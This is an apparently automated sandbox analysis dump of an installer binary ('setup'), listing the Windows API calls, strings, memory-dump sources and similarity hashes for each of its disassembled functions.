                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$Current$AddressEnterHandleInit_thread_footerInitializeLeaveLibraryLoadModuleProcProcessThread
                                                                                                                                                                              • String ID: *** Stack Trace (x86) ***$ v$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                                                                                                                                              • API String ID: 1326996155-981128330
                                                                                                                                                                              • Opcode ID: 92f028a04e93bacb3e53c6a0a13fb2ad46b796ac649490c4317d1b7825749719
                                                                                                                                                                              • Instruction ID: 08d9e2d0bd83bfbd02efe82c1071996f2ef6d1b8adbb34a51fcd3093f9f1a90d
                                                                                                                                                                              • Opcode Fuzzy Hash: 92f028a04e93bacb3e53c6a0a13fb2ad46b796ac649490c4317d1b7825749719
                                                                                                                                                                              • Instruction Fuzzy Hash: 9FD1BA70900668DFDB24DB64CC89BEEBBB4AF45301F1042EAE549B7291DB746B85CF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • RedrawWindow.USER32(?,00000000,00000000,00000507,02141699), ref: 00BB8D2E
                                                                                                                                                                              • IsWindow.USER32(?), ref: 00BB8D40
                                                                                                                                                                              • GetParent.USER32(?), ref: 00BB8D81
                                                                                                                                                                              • lstrcmpW.KERNEL32(?,#32770), ref: 00BB8DA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ParentRedrawlstrcmp
                                                                                                                                                                              • String ID: #32770
                                                                                                                                                                              • API String ID: 3033045798-463685578
                                                                                                                                                                              • Opcode ID: 267227465962e8ca6580cdeac681cfaaab93ac0554a42ac9976f7bade3380d2e
                                                                                                                                                                              • Instruction ID: 525679a59eb0f45dfa9ff60e4ccb6cc84c641e034416607231bd42c5f5c8d526
                                                                                                                                                                              • Opcode Fuzzy Hash: 267227465962e8ca6580cdeac681cfaaab93ac0554a42ac9976f7bade3380d2e
                                                                                                                                                                              • Instruction Fuzzy Hash: D2028E70A00209EFDB14DFA8C848BEEBBF9EF49314F144599F515E7290DBB59944CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(Advapi32.dll,02141699,?,00000000), ref: 00CC7761
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC778F
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00CC77A5
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00CC77BE
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC77CB
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC79B9
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC7A1E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$Library$AddressAllocateFreeHeapLoadProc
                                                                                                                                                                              • String ID: Advapi32.dll$ConvertStringSidToSidW
                                                                                                                                                                              • API String ID: 3460774402-1129428314
                                                                                                                                                                              • Opcode ID: f3b253a42e3a02f835fecf7fdbbefc88df16fb94cf50995b5e065f9becb92fa5
                                                                                                                                                                              • Instruction ID: cdc7d3bb30cb49d0c10d8ca24c22ea7e33547cd59e4efebd0dd9b9e108aeb7f5
                                                                                                                                                                              • Opcode Fuzzy Hash: f3b253a42e3a02f835fecf7fdbbefc88df16fb94cf50995b5e065f9becb92fa5
                                                                                                                                                                              • Instruction Fuzzy Hash: 9EF157B1C05209AFDB10DF94C945BEEBBB4FF04310F248229E915B7290E775AA59CFA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,02141699), ref: 00BD6528
                                                                                                                                                                                • Part of subcall function 00BB83A0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00BB83D6
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00BD662B
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 00BD663F
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,00000003,?), ref: 00BD6654
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 00BD6669
                                                                                                                                                                              • GetWindowTextLengthW.USER32(?), ref: 00BD6670
                                                                                                                                                                              • SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 00BD6680
                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 00BD66A0
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BD66B2
                                                                                                                                                                              • PtInRect.USER32(?,?,?), ref: 00BD66C2
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000412,00000000), ref: 00BD6714
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00BD6724
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$Rect$ClientCreateLengthLongScreenText
                                                                                                                                                                              • String ID: tooltips_class32
                                                                                                                                                                              • API String ID: 2480742200-1918224756
                                                                                                                                                                              • Opcode ID: 109337467920e993bb39acf791b4bd8d1eaaec75b324c3daefe1c3823b16fa80
                                                                                                                                                                              • Instruction ID: 5fbcc12dda832b9063076462fbfdf3b736c5d2dbf85798540f62018f6a7306a0
                                                                                                                                                                              • Opcode Fuzzy Hash: 109337467920e993bb39acf791b4bd8d1eaaec75b324c3daefe1c3823b16fa80
                                                                                                                                                                              • Instruction Fuzzy Hash: C6912C71A00348AFDB14DFA5CD95BAEBBF9FB08700F14852AF516EA291E774A904CB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00000318,00000000,00000004), ref: 00BD7C77
                                                                                                                                                                              • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00BD7C85
                                                                                                                                                                              • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00BD7C9F
                                                                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BD7CB7
                                                                                                                                                                              • SendMessageW.USER32(?,0000130A,00000000,?), ref: 00BD7CE8
                                                                                                                                                                              • CreateRectRgn.GDI32(?,?,?,?), ref: 00BD7D22
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00BD7D39
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BD7D55
                                                                                                                                                                              • CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 00BD7D80
                                                                                                                                                                              • CreateRectRgn.GDI32(?,?,?,?), ref: 00BD7D9D
                                                                                                                                                                              • SelectClipRgn.GDI32(00000000,00000000), ref: 00BD7DB4
                                                                                                                                                                              • GetParent.USER32(?), ref: 00BD7DC4
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000136,?,?), ref: 00BD7DD5
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00BD7DEB
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00BD7DF0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageRectSend$Create$DeleteObject$ClientClipParentSelect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1236051970-0
                                                                                                                                                                              • Opcode ID: 0877aed18c286f8cc34132e15999f1d9a944feb4eca8fd377b4657f8fee2604b
                                                                                                                                                                              • Instruction ID: d4d74bd6f3e079956f825ecc3dbc05853b83701a4d98dd9eb86c76e52b0fcf9b
                                                                                                                                                                              • Opcode Fuzzy Hash: 0877aed18c286f8cc34132e15999f1d9a944feb4eca8fd377b4657f8fee2604b
                                                                                                                                                                              • Instruction Fuzzy Hash: 39610572940218AFDB119FE5DD49BEEBBB9FF08710F200126F619EB2A0DB746954CB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 00BDC7B8
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 00BDC7D1
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000043,ShutdownEmbeddedUI), ref: 00BDC7DD
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000043,EmbeddedUIHandler), ref: 00BDC7EA
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$HeapInit_thread_footer$AllocateLibraryLoadProcess
                                                                                                                                                                              • String ID: build $20.9$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI$d71a6aa0
                                                                                                                                                                              • API String ID: 2564778481-2118497109
                                                                                                                                                                              • Opcode ID: ea80a71db05b6dd5cdf61bbe2c06940738f86928e2014ff783789bb996163c34
                                                                                                                                                                              • Instruction ID: 7d17eee2ebf4477023d65591a277e1b6ff18fa4f8856fac3cb5fc36f9b07aeab
                                                                                                                                                                              • Opcode Fuzzy Hash: ea80a71db05b6dd5cdf61bbe2c06940738f86928e2014ff783789bb996163c34
                                                                                                                                                                              • Instruction Fuzzy Hash: 04D17E7190020AAFDB04DFA4CC55BEEBBF4FF09714F14465AE815A7391EB74AA44CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory), ref: 00BAEEDE
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BAEEE4
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?), ref: 00BAEF17
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BAEF1D
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,00000004,-00000001,00000000,00E172AC,00000000,00000000,00000000), ref: 00BAF03D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF086
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-2454113998
                                                                                                                                                                              • Opcode ID: 3072c14a04cfb1ab71b7e335d98b4d70fef67db6eba045dc8e271e2c7562e762
                                                                                                                                                                              • Instruction ID: 87ddb64ee7b5ea7efabc44630063662377239f460908492a55eb4e34f2498939
                                                                                                                                                                              • Opcode Fuzzy Hash: 3072c14a04cfb1ab71b7e335d98b4d70fef67db6eba045dc8e271e2c7562e762
                                                                                                                                                                              • Instruction Fuzzy Hash: 24916C30D0820AEFDB24DFA8C895BEDB7F1EF59300F248169E411B7291EB719A45CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00EA16AC,02141699,?,00000010), ref: 00D000AC
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000010,02141699,?,00000010), ref: 00D000B9
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D000EB
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,?,00000000), ref: 00D000F4
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,00E1727C,00000001,?,?,?,00000000), ref: 00D00176
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,?,00000000), ref: 00D0017F
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000019,00000000,?,?,?,00000000), ref: 00D001B5
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,00000019,00000000,?,?,?,00000000), ref: 00D001BE
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,00E1A104,00000002,?,?,00000019,00000000,?,?,?,00000000), ref: 00D0021F
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,00000019,00000000,?,?,?,00000000), ref: 00D00228
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,?,00000019,00000000,?,?,?,00000000), ref: 00D00258
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$BuffersFlushWrite$CriticalSection$AllocateEnterFindHeapInitializeLeaveResource
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 201293332-3261393531
                                                                                                                                                                              • Opcode ID: 3c27e5e3867b068fc9912bc38e623f9022e40f9767411d9b2e544b0ca6f4d4b6
                                                                                                                                                                              • Instruction ID: 7febd93dc75893f1454c19b861004b07b3eb862046cd84130da6880f0fb43064
                                                                                                                                                                              • Opcode Fuzzy Hash: 3c27e5e3867b068fc9912bc38e623f9022e40f9767411d9b2e544b0ca6f4d4b6
                                                                                                                                                                              • Instruction Fuzzy Hash: 93619B30905644EFEB00DFA9CD49BAABBB4FF09310F148258F855A72A1D7319958CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC1324
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC1403
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BC1415
                                                                                                                                                                              • GetWindowDC.USER32(?), ref: 00BC1427
                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00BC1454
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000), ref: 00BC1496
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00BC14A5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: RectWindow$CompatibleCreate$BitmapClientObjectSelect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2032541772-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BB6F9E
                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 00BB6FBD
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00BB6FC4
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BB701F
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00BB7038
                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00BB7045
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00BB7057
                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 00BB7080
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00BB708A
                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000008,00000008,00000000,00000000,00000000,00CC0020), ref: 00BB70C7
                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00BB70D2
                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00BB70D9
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ObjectRect$Delete$ClientCompatibleCreateFillSelect$Bitmap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 441990398-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00BE72B0,00E1C158,00000000,?), ref: 00BE722A
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00BE7243
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00BE7259
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCreateHandleObjectSingleThreadWait
                                                                                                                                                                              • String ID: r
                                                                                                                                                                              • API String ID: 51348343-3729450569
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 00D01C42
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              • ResetEvent.KERNEL32(00000000,02141699,?,?,00000000,00DF67FD,000000FF,?,80004005), ref: 00D01CDF
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00DF67FD,000000FF,?,80004005), ref: 00D01CFF
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00DF67FD,000000FF,?,80004005), ref: 00D01D0A
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapInit_thread_footerObjectSingleWait$AllocateDeleteEventFileFindProcessResetResource
                                                                                                                                                                              • String ID: TEST$http://www.example.com$http://www.google.com$http://www.yahoo.com$tin9999.tmp
                                                                                                                                                                              • API String ID: 3248508590-625802988
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00C889F0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C88A31
                                                                                                                                                                              • GetLastError.KERNEL32(02141699,?,?,?,00DF66ED,000000FF,?,00CE39A2,?), ref: 00D0161D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetPackagePath), ref: 00D017AD
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetPackagePath), ref: 00D01806
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,00DF66ED,000000FF,?,00CE39A2,?), ref: 00D018F4
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$DirectoryErrorFreeLastLibrarySystem
                                                                                                                                                                              • String ID: GetPackagePath$Kernel32.dll$neutral$x64$x86
                                                                                                                                                                              • API String ID: 2155880084-4043905686
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD4E8
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD4F2
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD501
                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00BAD51E
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD528
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD535
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00BAD53F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
